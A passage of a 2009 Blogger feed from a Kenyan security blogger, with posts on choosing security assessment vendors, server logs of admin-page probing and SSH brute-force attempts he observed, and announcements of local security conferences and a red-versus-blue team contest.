id="BLOGGER_PHOTO_ID_5379443936109651314" border="0" /&gt;&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;The information within this paper may change without notice. 
Use of this information constitutes acceptance for use in an AS IS condition. 
There are NO warranties with regard to this information. 
In no event shall the author be liable for any damages whatsoever arising 
out of or in connection with the use or spread of this information. 
Any use of this information is at the user's own risk. 
The information is for educational use only.&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6760447586854804036-3159574043258146292?l=chuksjonia.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://chuksjonia.blogspot.com/feeds/3159574043258146292/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6760447586854804036&amp;postID=3159574043258146292' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6760447586854804036/posts/default/3159574043258146292'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6760447586854804036/posts/default/3159574043258146292'/><link rel='alternate' type='text/html' href='http://chuksjonia.blogspot.com/2009/09/secureict-day-one.html' title='SecureICT day one'/><author><name>chuksjonia</name><uri>http://www.blogger.com/profile/12265538270706464560</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='21' src='http://4.bp.blogspot.com/_J9LOpyWWr2o/SQYwU-cIFpI/AAAAAAAAAOI/t7DKi1ashdQ/S220/mr+veddatta.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://1.bp.blogspot.com/_J9LOpyWWr2o/SqehcJJPO0I/AAAAAAAAAZE/b5VV3S6dqgI/s72-c/IMG_2758.JPG' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6760447586854804036.post-7137143696328559234</id><published>2009-08-22T19:49:00.007+03:00</published><updated>2009-08-24T01:02:58.974+03:00</updated><title type='text'>WHY WE MIGHT NEED A BETTER SECURITY ASSESSMENT VENDOR</title><content type='html'>&lt;a style="" onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/_J9LOpyWWr2o/SpBB1hwktbI/AAAAAAAAAXM/Bi8hDt7dyWw/s1600-h/action.png"&gt;&lt;img style="margin: 0pt 10px 10px 0pt; float: left; cursor: pointer; width: 321px; height: 250px;" src="http://1.bp.blogspot.com/_J9LOpyWWr2o/SpBB1hwktbI/AAAAAAAAAXM/Bi8hDt7dyWw/s400/action.png" alt="" id="BLOGGER_PHOTO_ID_5372866743303976370" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;	&lt;meta equiv="CONTENT-TYPE" content="text/html; charset=utf-8"&gt; 	&lt;title&gt;&lt;/title&gt; 	&lt;meta name="GENERATOR" content="OpenOffice.org 2.4  (Linux)"&gt; 	&lt;style type="text/css"&gt; 	&lt;!-- 		@page { size: 8.5in 11in; margin: 0.79in } 		P { margin-bottom: 0.08in } 	--&gt; 	&lt;/style&gt;  &lt;p style="margin-bottom: 0in;"&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/p&gt;&lt;p style="margin-bottom: 0in;"&gt;&lt;b&gt;THE SCAMS&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;During the mail list last week, a member brought up this issue whereby i was also involved in the consultancy in a company situated in Ghana.&lt;br /&gt;&lt;a href="http://lists.my.co.ke/pipermail/security/2009-August/000566.html"&gt;http://lists.my.co.ke/pipermail/security/2009-August/000566.html&lt;/a&gt;&lt;/p&gt; &lt;p style="margin-bottom: 0in;"&gt;&lt;br /&gt;This a bit hilarious provided that these guys were doing a security assessment for the company and i expected such a company like KPMG to be aware of the security assessment factors and which services are offered during such an engagement.&lt;br /&gt;&lt;br /&gt;&lt;b&gt;THE FACTORS&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;So which factors does a client need to look into before taking in a Security Assessment:&lt;br /&gt;a)Penetration testing External or Internal&lt;br /&gt;b)Durations, how many times do you need the service, annually, semi-annually?&lt;br /&gt;c)Last but not least, which security assessment service do you need.&lt;br /&gt;&lt;br /&gt;Before we go down to some explanations, during a presentation at KRA i did explain the difference between a Vulnerability Assessment and a Penetration Test. To make that statement short, a penetration test is the actual outcome after a vulnerability assessment. In short a penetration test is the actual hands on confirmation of a vulnerability picked up during a Vulnerability Assessment therefore its a VA logical conclusion.&lt;br /&gt;&lt;br /&gt;&lt;b&gt;EXTERNAL AND INTERNAL TESTING&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;During a test, you might choose if you want the pentest to be performed outside your network from a remote site or you want the engineers&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/_J9LOpyWWr2o/SpBIW0Kb_8I/AAAAAAAAAXU/5_c-F4wivIc/s1600-h/intelligence.png"&gt;&lt;img style="margin: 0pt 0pt 10px 10px; float: right; cursor: pointer; width: 400px; height: 293px;" src="http://1.bp.blogspot.com/_J9LOpyWWr2o/SpBIW0Kb_8I/AAAAAAAAAXU/5_c-F4wivIc/s400/intelligence.png" alt="" id="BLOGGER_PHOTO_ID_5372873912249745346" border="0" /&gt;&lt;/a&gt; to be in the network. When its performed externally, the engagement is taken inform of an outsider Blackhat who is supposed to bypass your firewall and any device on your perimeter from the internet. In such kind of test, the testers are not given any IP ranges, no DNS and no users, in short, no information, they have to covertly collect it and perform as much intelligence as they can before picking their prime targets. This test is commonly known as Blackbox pentesting.&lt;br /&gt;&lt;br /&gt;The internal testing, this is carried more of like an inside threat. Someone who is already behind the perimeter, who has much info about the network and the organization. Here the testers will try to use social engineering, privilege escalation, exploitation etc.&lt;br /&gt;&lt;br /&gt;&lt;b&gt;DURATIONS, HOW MANY TIMES DO YOU NEED THE SERVICE, ANNUALLY, SEMI-ANNUALLY?&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;This may be considered by the security team in an organization that needs this service and also from the consultants perspective. The factors may include:&lt;br /&gt;a) Threat Intelligence&lt;br /&gt;b) Security Incidents (scan, bruteforces, hack attempts, DOS)&lt;br /&gt;c) Insiders&lt;br /&gt;d) Business espionage&lt;br /&gt;e) Perimeter devices and applications e.g Portals, may need external blackbox pentests&lt;br /&gt;d) Application and system changes including addition of clients and employees&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;WHICH SECURITY SERVICE DO YOU NEED&lt;/b&gt;?&lt;br /&gt;&lt;br /&gt;One thing I have noticed with most of the security vendors in Africa is that they come with crazy names for their products that leaves customers wondering which to take and get up tricked into non service commitment. When a client asks for a security assessment, or an organization which needs one, this is what to look into as the services needed.&lt;/p&gt; &lt;p style="margin-bottom: 0in;"&gt;a) Vulnerability Assessment&lt;/p&gt; &lt;p style="margin-bottom: 0in;"&gt;b) Penetration testing&lt;/p&gt; &lt;p style="margin-bottom: 0in;"&gt;c) Web Application Assessment&lt;/p&gt; &lt;p style="margin-bottom: 0in;"&gt;d) Physical Security Assessment&lt;/p&gt; &lt;p style="margin-bottom: 0in;"&gt;This is just to mention the most important ones. I will be writing a brief blog entry for each of them soon.&lt;br /&gt;&lt;/p&gt;&lt;p style="margin-bottom: 0in;"&gt;./Chuks&lt;br /&gt;&lt;/p&gt; &lt;p style="margin-bottom: 0in;"&gt;&lt;br /&gt;&lt;/p&gt; &lt;div class="blogger-post-footer"&gt;The information within this paper may change without notice. 
Use of this information constitutes acceptance for use in an AS IS condition. 
There are NO warranties with regard to this information. 
In no event shall the author be liable for any damages whatsoever arising 
out of or in connection with the use or spread of this information. 
Any use of this information is at the user's own risk. 
The information is for educational use only.&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6760447586854804036-7137143696328559234?l=chuksjonia.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://chuksjonia.blogspot.com/feeds/7137143696328559234/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6760447586854804036&amp;postID=7137143696328559234' title='2 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6760447586854804036/posts/default/7137143696328559234'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6760447586854804036/posts/default/7137143696328559234'/><link rel='alternate' type='text/html' href='http://chuksjonia.blogspot.com/2009/08/why-we-might-need-better-security.html' title='WHY WE MIGHT NEED A BETTER SECURITY ASSESSMENT VENDOR'/><author><name>chuksjonia</name><uri>http://www.blogger.com/profile/12265538270706464560</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='21' src='http://4.bp.blogspot.com/_J9LOpyWWr2o/SQYwU-cIFpI/AAAAAAAAAOI/t7DKi1ashdQ/S220/mr+veddatta.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://1.bp.blogspot.com/_J9LOpyWWr2o/SpBB1hwktbI/AAAAAAAAAXM/Bi8hDt7dyWw/s72-c/action.png' height='72' width='72'/><thr:total>2</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6760447586854804036.post-4956783038782461344</id><published>2009-08-17T23:31:00.005+03:00</published><updated>2009-08-18T00:09:15.789+03:00</updated><title type='text'>Hacking in EA just grew bigger</title><content type='html'>&lt;a style="" onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://2.bp.blogspot.com/_J9LOpyWWr2o/SonEvGSKDRI/AAAAAAAAAW8/8Btmm2vrtOk/s1600-h/intelDC.png"&gt;&lt;img style="margin: 0pt 0pt 10px 10px; float: right; cursor: pointer; width: 400px; height: 224px;" src="http://2.bp.blogspot.com/_J9LOpyWWr2o/SonEvGSKDRI/AAAAAAAAAW8/8Btmm2vrtOk/s400/intelDC.png" alt="" id="BLOGGER_PHOTO_ID_5371040344035691794" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;Recently, after the last few posts in sec forums, though the hate and the mail list trolling, i realized a sudden increase of attacks on some of the servers i man security-wise. The attacker was going mostly for the webserver keeping me awake on Friday, through Saturday and i had to get a little of sleep on Sunday.&lt;br /&gt;&lt;br /&gt;One crazy initiative is that the guy was trying to look for links which he can use to gain access to one of the sites.&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 0, 0);"&gt;41.223.57.73 - - [16/Aug/2009:16:01:57 +0300] "GET /www2/admin HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.2; af; rv:1.9.0.13) Gecko/2009073022 Firefox/3.0.13"&lt;/span&gt; &lt;span style="color: rgb(204, 0, 0);"&gt;&lt;br /&gt;41.223.57.76 - - [16/Aug/2009:16:02:16 +0300] "GET /www2/admin.html HTTP/1.1" 404 280 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.2; af; rv:1.9.0.13) Gecko/2009073022 Firefox/3.0.13"&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 0, 0);"&gt;41.223.57.74 - - [16/Aug/2009:16:03:13 +0300] "GET /admin.html HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.2; af; rv:1.9.0.13) Gecko/2009073022 Firefox/3.0.13"&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 0, 0);"&gt;41.223.57.75 - - [16/Aug/2009:16:03:43 +0300] "GET /administrator HTTP/1.1" 404 278 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.2; af; rv:1.9.0.13) Gecko/2009073022 Firefox/3.0.13"&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 0, 0);"&gt;41.223.57.74 - - [16/Aug/2009:16:03:55 +0300] "GET /administrator/backup HTTP/1.1" 404 285 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.2; af; rv:1.9.0.13) Gecko/2009073022 Firefox/3.0.13"&lt;/span&gt; &lt;span style="color: rgb(204, 0, 0);"&gt;&lt;br /&gt;41.223.57.78 - - [16/Aug/2009:16:04:07 +0300] "GET /administrator/login.php HTTP/1.1" 404 288 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.2; af; rv:1.9.0.13) Gecko/2009073022 Firefox/3.0.13"&lt;/span&gt; &lt;span style="color: rgb(204, 0, 0);"&gt;&lt;br /&gt;41.223.57.76 - - [16/Aug/2009:16:04:28 +0300] "GET /admin.php HTTP/1.1" 404 274 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.2; af; rv:1.9.0.13) Gecko/2009073022 Firefox/3.0.13"&lt;/span&gt; &lt;span style="color: rgb(204, 0, 0);"&gt;&lt;br /&gt;41.223.57.75 - - [16/Aug/2009:16:05:29 +0300] "GET /vpn_administration HTTP/1.1" 404 283 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.2; af; rv:1.9.0.13) Gecko/2009073022 Firefox/3.0.13"&lt;/span&gt; &lt;span style="color: rgb(204, 0, 0);"&gt;&lt;br /&gt;41.223.57.77 - - [16/Aug/2009:16:06:06 +0300] "GET /vpn_administrator HTTP/1.1" 404 282 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.2; af; rv:1.9.0.13) Gecko/2009073022 Firefox/3.0.13"&lt;/span&gt; &lt;span style="color: rgb(204, 0, 0);"&gt;&lt;br /&gt;41.223.57.73 - - [16/Aug/2009:16:10:13 +0300] "GET /www2/administrator HTTP/1.1" 404 283 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.2; af; rv:1.9.0.13) Gecko/2009073022 Firefox/3.0.13&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;This was not even as bad as sshd attack which took 47 to 50 hours of straight bruteforce. He was trying usernames like admin, admin_companyname and companyname and all these are not on default sshd port. A snipet here.&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 0, 0);"&gt;Aug 15 01:10:01 xxxxx sshd[3834]: pam_unix(sshd:auth): authentication failure; logname= uid=0 e&lt;/span&gt; &lt;span style="color: rgb(204, 0, 0);"&gt;uid=0 tty=ssh ruser= rhost=41.223.57.74&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 0, 0);"&gt;Aug 15 01:10:01 xxxxx sshd[3834]: pam_succeed_if(sshd:auth): error retrieving information about&lt;/span&gt; &lt;span style="color: rgb(204, 0, 0);"&gt; user admin&lt;/span&gt; &lt;span style="color: rgb(204, 0, 0);"&gt;&lt;br /&gt;Aug 15 01:10:02 xxxxx sshd[3834]: Failed password for invalid user admin from 41.223.57.74 port&lt;/span&gt; &lt;span style="color: rgb(204, 0, 0);"&gt; 48129 ssh2&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 0, 0);"&gt;Aug 15 01:10:17 xxxxx sshd[3834]: pam_unix(sshd:auth): check pass; user unknown&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 0, 0);"&gt;Aug 15 01:10:17 xxxxx sshd[3834]: pam_succeed_if(sshd:auth): error retrieving information about&lt;/span&gt; &lt;span style="color: rgb(204, 0, 0);"&gt; user admin&lt;/span&gt; &lt;span style="color: rgb(204, 0, 0);"&gt;&lt;br /&gt;Aug 15 01:10:19 xxxxx sshd[3834]: Failed password for invalid user admin from 41.223.57.74 port&lt;/span&gt; &lt;span style="color: rgb(204, 0, 0);"&gt; 48129 ssh2&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;The bruteforce goes on through Saturday to Sunday......&lt;br /&gt;&lt;span style="color: rgb(204, 0, 0);"&gt;Aug 16 00:03:03 xxxxx sshd[7758]: Failed password for invalid user admin_xxxxx from 41.223.&lt;/span&gt; &lt;span style="color: rgb(204, 0, 0);"&gt;57.72 port 57217 ssh2&lt;/span&gt; &lt;span style="color: rgb(204, 0, 0);"&gt;&lt;br /&gt;Aug 16 00:03:09 xxxxx sshd[7758]: pam_unix(sshd:auth): check pass; user unknown&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 0, 0);"&gt;Aug 16 00:03:09 xxxxx sshd[7758]: pam_succeed_if(sshd:auth): error retrieving information about&lt;/span&gt; &lt;span style="color: rgb(204, 0, 0);"&gt; user admin_xxxxx&lt;/span&gt; &lt;span style="color: rgb(204, 0, 0);"&gt;&lt;br /&gt;Aug 16 00:03:11 xxxxx sshd[7758]: Failed password for invalid user admin_xxxxx from 41.223.&lt;/span&gt; &lt;span style="color: rgb(204, 0, 0);"&gt;57.72 port 57217 ssh2&lt;/span&gt; &lt;span style="color: rgb(204, 0, 0);"&gt;&lt;br /&gt;Aug 16 00:04:52 xxxxx sshd[7768]: Invalid user admin_xxxxx from 41.223.57.72&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;This is just to warn the hacker upto this mischief, just know i am watching you alot and if you have never seen such crazy logs in your perimeter machines, please check again.&lt;br /&gt;&lt;br /&gt;All the above IPs are from Zain Modems.&lt;br /&gt;&lt;br /&gt;./Chuks&lt;div class="blogger-post-footer"&gt;The information within this paper may change without notice. 
Use of this information constitutes acceptance for use in an AS IS condition. 
There are NO warranties with regard to this information. 
In no event shall the author be liable for any damages whatsoever arising 
out of or in connection with the use or spread of this information. 
Any use of this information is at the user's own risk. 
The information is for educational use only.&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6760447586854804036-4956783038782461344?l=chuksjonia.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://chuksjonia.blogspot.com/feeds/4956783038782461344/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6760447586854804036&amp;postID=4956783038782461344' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6760447586854804036/posts/default/4956783038782461344'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6760447586854804036/posts/default/4956783038782461344'/><link rel='alternate' type='text/html' href='http://chuksjonia.blogspot.com/2009/08/hacking-in-ea-just-grew-bigger.html' title='Hacking in EA just grew bigger'/><author><name>chuksjonia</name><uri>http://www.blogger.com/profile/12265538270706464560</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='21' src='http://4.bp.blogspot.com/_J9LOpyWWr2o/SQYwU-cIFpI/AAAAAAAAAOI/t7DKi1ashdQ/S220/mr+veddatta.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://2.bp.blogspot.com/_J9LOpyWWr2o/SonEvGSKDRI/AAAAAAAAAW8/8Btmm2vrtOk/s72-c/intelDC.png' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6760447586854804036.post-8690982120046571935</id><published>2009-08-08T16:16:00.003+03:00</published><updated>2009-08-08T16:25:21.867+03:00</updated><title type='text'>Incoming SecureICT!!!!</title><content type='html'>&lt;a style="" onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/_J9LOpyWWr2o/Sn18b8JuoMI/AAAAAAAAAWs/XMJK6dlj5po/s1600-h/more_inject_packets2.png"&gt;&lt;img style="margin: 0pt 0pt 10px 10px; float: right; cursor: pointer; width: 400px; height: 211px;" src="http://1.bp.blogspot.com/_J9LOpyWWr2o/Sn18b8JuoMI/AAAAAAAAAWs/XMJK6dlj5po/s400/more_inject_packets2.png" alt="" id="BLOGGER_PHOTO_ID_5367583150340743362" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Okey guys, you remember the http://secureict.co.ke/. we are getting ready for the Conference. See you guys there, am doing Wireless Penetration testing presentation.&lt;br /&gt;&lt;br /&gt;Good weekend.&lt;br /&gt;&lt;br /&gt;./Chuks&lt;div class="blogger-post-footer"&gt;The information within this paper may change without notice. 
Use of this information constitutes acceptance for use in an AS IS condition. 
There are NO warranties with regard to this information. 
In no event shall the author be liable for any damages whatsoever arising 
out of or in connection with the use or spread of this information. 
Any use of this information is at the user's own risk. 
The information is for educational use only.&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6760447586854804036-8690982120046571935?l=chuksjonia.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://chuksjonia.blogspot.com/feeds/8690982120046571935/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6760447586854804036&amp;postID=8690982120046571935' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6760447586854804036/posts/default/8690982120046571935'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6760447586854804036/posts/default/8690982120046571935'/><link rel='alternate' type='text/html' href='http://chuksjonia.blogspot.com/2009/08/incoming-secureict.html' title='Incoming SecureICT!!!!'/><author><name>chuksjonia</name><uri>http://www.blogger.com/profile/12265538270706464560</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='21' src='http://4.bp.blogspot.com/_J9LOpyWWr2o/SQYwU-cIFpI/AAAAAAAAAOI/t7DKi1ashdQ/S220/mr+veddatta.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://1.bp.blogspot.com/_J9LOpyWWr2o/Sn18b8JuoMI/AAAAAAAAAWs/XMJK6dlj5po/s72-c/more_inject_packets2.png' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6760447586854804036.post-5435812155525258740</id><published>2009-07-12T19:02:00.009+03:00</published><updated>2009-07-12T21:27:58.785+03:00</updated><title type='text'>Afr0-w00t convention announced in the Forums</title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/_J9LOpyWWr2o/SloWzZxuatI/AAAAAAAAAWk/zUfCGIkwPEw/s1600-h/hat.png"&gt;&lt;img style="margin: 0pt 0pt 10px 10px; float: right; cursor: pointer; width: 88px; height: 129px;" src="http://4.bp.blogspot.com/_J9LOpyWWr2o/SloWzZxuatI/AAAAAAAAAWk/zUfCGIkwPEw/s400/hat.png" alt="" id="BLOGGER_PHOTO_ID_5357619779059215058" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Hi. If you are member of Security Forums, Kictanet, Skunksworks, you may have seen the call for papers for Afr0-w00t hackers convention. This is going to be the first of a kind in Kenya. http://bit.ly/NSzbM&lt;br /&gt;&lt;br /&gt;We are expecting papers from most of the information security experts in Africa and Kenya mostly coz it will held in Kenya, Nairobi.&lt;br /&gt;&lt;br /&gt;This year, we will make this convention a different one from any other information security conference ever done in Kenya. This is due to the fact that, most of the topics this year will be more on hardcore hacking and penetration seen in Nairobi.&lt;br /&gt;&lt;br /&gt;We will also set up a contest, Hacking the Box. More information will posted in the security mailist in my.co.ke.&lt;br /&gt;&lt;br /&gt;./Chuks&lt;div class="blogger-post-footer"&gt;The information within this paper may change without notice. 
Use of this information constitutes acceptance for use in an AS IS condition. 
There are NO warranties with regard to this information. 
In no event shall the author be liable for any damages whatsoever arising 
out of or in connection with the use or spread of this information. 
Any use of this information is at the user's own risk. 
The information is for educational use only.&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6760447586854804036-5435812155525258740?l=chuksjonia.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://chuksjonia.blogspot.com/feeds/5435812155525258740/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6760447586854804036&amp;postID=5435812155525258740' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6760447586854804036/posts/default/5435812155525258740'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6760447586854804036/posts/default/5435812155525258740'/><link rel='alternate' type='text/html' href='http://chuksjonia.blogspot.com/2009/07/afr0-w00t-convention-announced-in.html' title='Afr0-w00t convention announced in the Forums'/><author><name>chuksjonia</name><uri>http://www.blogger.com/profile/12265538270706464560</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='21' src='http://4.bp.blogspot.com/_J9LOpyWWr2o/SQYwU-cIFpI/AAAAAAAAAOI/t7DKi1ashdQ/S220/mr+veddatta.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://4.bp.blogspot.com/_J9LOpyWWr2o/SloWzZxuatI/AAAAAAAAAWk/zUfCGIkwPEw/s72-c/hat.png' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6760447586854804036.post-4667525164476257757</id><published>2009-07-01T14:00:00.004+03:00</published><updated>2009-07-01T15:58:27.498+03:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Kenyan Security Maillist'/><title type='text'>is Kenya Safe from a Cyber Attack</title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/_J9LOpyWWr2o/SktasArby6I/AAAAAAAAAWM/y54IqyMtnhk/s1600-h/forDod.png"&gt;&lt;img style="margin: 0pt 10px 10px 0pt; float: left; cursor: pointer; width: 400px; height: 275px;" src="http://1.bp.blogspot.com/_J9LOpyWWr2o/SktasArby6I/AAAAAAAAAWM/y54IqyMtnhk/s400/forDod.png" alt="" id="BLOGGER_PHOTO_ID_5353472294202887074" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Hi guys.&lt;br /&gt;We have currently been discussing at The Security Forum about a post we found online on Cyber attacks in Kenya and if Kenya is Safe incase of such a launch.&lt;br /&gt;&lt;br /&gt;Most of the Discussion are here:&lt;br /&gt;&lt;br /&gt;http://lists.my.co.ke/pipermail/security/2009-June/000283.html&lt;br /&gt;&lt;br /&gt;http://lists.my.co.ke/pipermail/security/2009-June/000285.html&lt;br /&gt;&lt;br /&gt;More found, http://lists.my.co.ke/pipermail/security/2009-July/000286.html&lt;br /&gt;&lt;br /&gt;And another post from tyrus, http://lists.my.co.ke/pipermail/security/2009-July/000289.html&lt;br /&gt;&lt;br /&gt;What do u guys think? What are the major utilities if shutdown, can affect the ways of Kenyan?&lt;br /&gt;&lt;br /&gt;./Chuks&lt;div class="blogger-post-footer"&gt;The information within this paper may change without notice. 
Use of this information constitutes acceptance for use in an AS IS condition. 
There are NO warranties with regard to this information. 
In no event shall the author be liable for any damages whatsoever arising 
out of or in connection with the use or spread of this information. 
Any use of this information is at the user's own risk. 
The information is for educational use only.&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6760447586854804036-4667525164476257757?l=chuksjonia.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://chuksjonia.blogspot.com/feeds/4667525164476257757/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6760447586854804036&amp;postID=4667525164476257757' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6760447586854804036/posts/default/4667525164476257757'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6760447586854804036/posts/default/4667525164476257757'/><link rel='alternate' type='text/html' href='http://chuksjonia.blogspot.com/2009/07/is-kenya-safe-from-cyber-attack.html' title='is Kenya Safe from a Cyber Attack'/><author><name>chuksjonia</name><uri>http://www.blogger.com/profile/12265538270706464560</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='21' src='http://4.bp.blogspot.com/_J9LOpyWWr2o/SQYwU-cIFpI/AAAAAAAAAOI/t7DKi1ashdQ/S220/mr+veddatta.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://1.bp.blogspot.com/_J9LOpyWWr2o/SktasArby6I/AAAAAAAAAWM/y54IqyMtnhk/s72-c/forDod.png' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6760447586854804036.post-9177188117580415772</id><published>2009-05-03T00:15:00.004+03:00</published><updated>2009-05-03T15:50:38.256+03:00</updated><title type='text'>April heated debate.[Security Forum] Lab Pentesting versus Real World tests</title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://2.bp.blogspot.com/_J9LOpyWWr2o/Sfy6a5604aI/AAAAAAAAAVU/yDWUPng-vwY/s1600-h/heated_discussion.png"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 562px; height: 205px;" src="http://2.bp.blogspot.com/_J9LOpyWWr2o/Sfy6a5604aI/AAAAAAAAAVU/yDWUPng-vwY/s400/heated_discussion.png" alt="" id="BLOGGER_PHOTO_ID_5331341030286746018" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;April heated debate was on Lab pentesting versus Real World testings where alot of the pentesters felt that you get to learn a lot from testing real and live server rather than Lab networks where you are aware of everything.&lt;br /&gt;&lt;br /&gt;There was also this proposal by Simiyu that he come up about a competion, "&lt;br /&gt;&lt;pre&gt;blue Team:&lt;br /&gt;All the sys admins, web developers on the skunkworks list.&lt;br /&gt;They get to install and  run their apps on some local network.&lt;br /&gt;&lt;br /&gt;Red Team:&lt;br /&gt;Pen testers from Kenya, from the list and as well as those who are not on the list.&lt;br /&gt;They get to try and break into the set up network.&lt;br /&gt;&lt;br /&gt;At the end of the day both teams sit down and discuss on the vulnerabilities discovered&lt;br /&gt;and how to prevent such attacks in real life scenarios and the losers buy lunch of course ;)"&lt;br /&gt;&lt;br /&gt;&lt;/pre&gt;&lt;div style="text-align: left;"&gt;Reply guys&lt;br /&gt;&lt;br /&gt;./Chuks&lt;br /&gt;&lt;/div&gt;&lt;pre&gt;&lt;/pre&gt;&lt;div class="blogger-post-footer"&gt;The information within this paper may change without notice. 
Use of this information constitutes acceptance for use in an AS IS condition. 
There are NO warranties with regard to this information. 
